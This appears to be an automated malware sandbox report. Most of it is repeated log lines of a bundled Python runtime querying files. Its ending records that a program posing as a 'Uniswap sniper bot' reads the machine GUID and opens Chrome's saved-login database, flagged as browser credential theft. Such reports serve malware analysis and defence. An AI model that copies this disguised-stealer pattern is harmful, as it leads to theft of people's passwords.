Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re\_parser.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re\_parser.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re\_parser.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re\__pycache__ VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re\__pycache__\_parser.cpython-311.pyc.2128155426864 VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re\_constants.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re\__pycache__\_constants.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re\__pycache__\_constants.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re\_constants.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re\_constants.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re\_constants.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re\__pycache__ VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re\__pycache__\_constants.cpython-311.pyc.2128153609904 VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re\_casefix.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re\__pycache__\_casefix.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re\__pycache__\_casefix.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re\_casefix.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re\_casefix.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re\_casefix.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re\__pycache__ VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\re\__pycache__\_casefix.cpython-311.pyc.2128153612336 VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\copyreg.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\copyreg.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\copyreg.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\copyreg.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\copyreg.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__ VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\copyreg.cpython-311.pyc.2128155279856 VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\struct.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\struct.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\struct.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\struct.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\struct.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\struct.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__ VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\struct.cpython-311.pyc.2128155280416 VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\platform.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\platform.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\platform.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\platform.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\platform.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\platform.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__ VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\platform.cpython-311.pyc.2128155281536 VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\subprocess.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\subprocess.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\subprocess.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\subprocess.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\subprocess.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\subprocess.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__ VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\subprocess.cpython-311.pyc.2128155283664 VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\locale.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\locale.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\locale.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\locale.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\locale.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\locale.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__ VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\locale.cpython-311.pyc.2128155285680 VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\signal.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\signal.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\signal.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\signal.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\signal.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__ VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\signal.cpython-311.pyc.2128155288928 VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\threading.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\threading.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\threading.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\threading.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\threading.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\threading.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\threading.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__ VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\threading.cpython-311.pyc.2128155288928 VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\_weakrefset.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\_weakrefset.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\_weakrefset.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\_weakrefset.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\_weakrefset.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\_weakrefset.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\_weakrefset.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__ VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\_weakrefset.cpython-311.pyc.2128153979696 VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\warnings.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\warnings.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\warnings.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\warnings.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\warnings.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\warnings.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__ VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\warnings.cpython-311.pyc.2128155292848 VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\contextlib.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\contextlib.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\contextlib.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\contextlib.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\contextlib.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\contextlib.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\contextlib.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__ VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\contextlib.cpython-311.pyc.2128155199056 VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\win32\lib VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\requests\__pycache__\__init__.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\requests\__pycache__\__init__.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\requests\__init__.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\requests\__init__.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\requests\__init__.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\requests\__pycache__ VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\requests\__pycache__\__init__.cpython-311.pyc.2128155515840 VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\urllib3\__pycache__\__init__.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\urllib3\__pycache__\__init__.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\urllib3\__init__.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\urllib3\__init__.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\urllib3\__init__.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\urllib3\__pycache__ VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\site-packages\urllib3\__pycache__\__init__.cpython-311.pyc.2128155517280 VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__future__.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__future__.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\__future__.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\__future__.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__future__.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__future__.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__future__.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__ VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\__future__.cpython-311.pyc.2128155203424 VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\logging\__init__.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\logging\__init__.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\logging\__pycache__\__init__.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\logging\__pycache__\__init__.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\logging\__init__.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\logging\__init__.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\logging\__pycache__ VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\logging\__pycache__\__init__.cpython-311.pyc.2128153832880 VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\traceback.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\traceback.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\traceback.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\traceback.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\traceback.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\traceback.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\traceback.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__ VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\traceback.cpython-311.pyc.2128155205776 VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\collections VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\collections VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\collections VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\collections\abc.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\collections\abc.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\collections\__pycache__\abc.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\collections\__pycache__\abc.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\collections\abc.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\collections\abc.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\collections\abc.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\collections\__pycache__ VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\collections\__pycache__\abc.cpython-311.pyc.2128153828016 VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\linecache.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\linecache.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\linecache.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\linecache.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\linecache.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\linecache.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\linecache.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__ VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\linecache.cpython-311.pyc.2126015646496 VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\tokenize.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\tokenize.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\tokenize.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\tokenize.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\tokenize.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\tokenize.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\tokenize.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__ VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\__pycache__\tokenize.cpython-311.pyc.2126015644032 VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\__init__.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\__init__.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\__pycache__\__init__.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\__pycache__\__init__.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\aliases.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\aliases.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\__pycache__\aliases.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\__pycache__\aliases.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\utf_8.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\__pycache__\utf_8.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\__pycache__\utf_8.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\cp1252.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\__pycache__\cp1252.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\__pycache__\cp1252.cpython-311.pyc VolumeInformation

Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
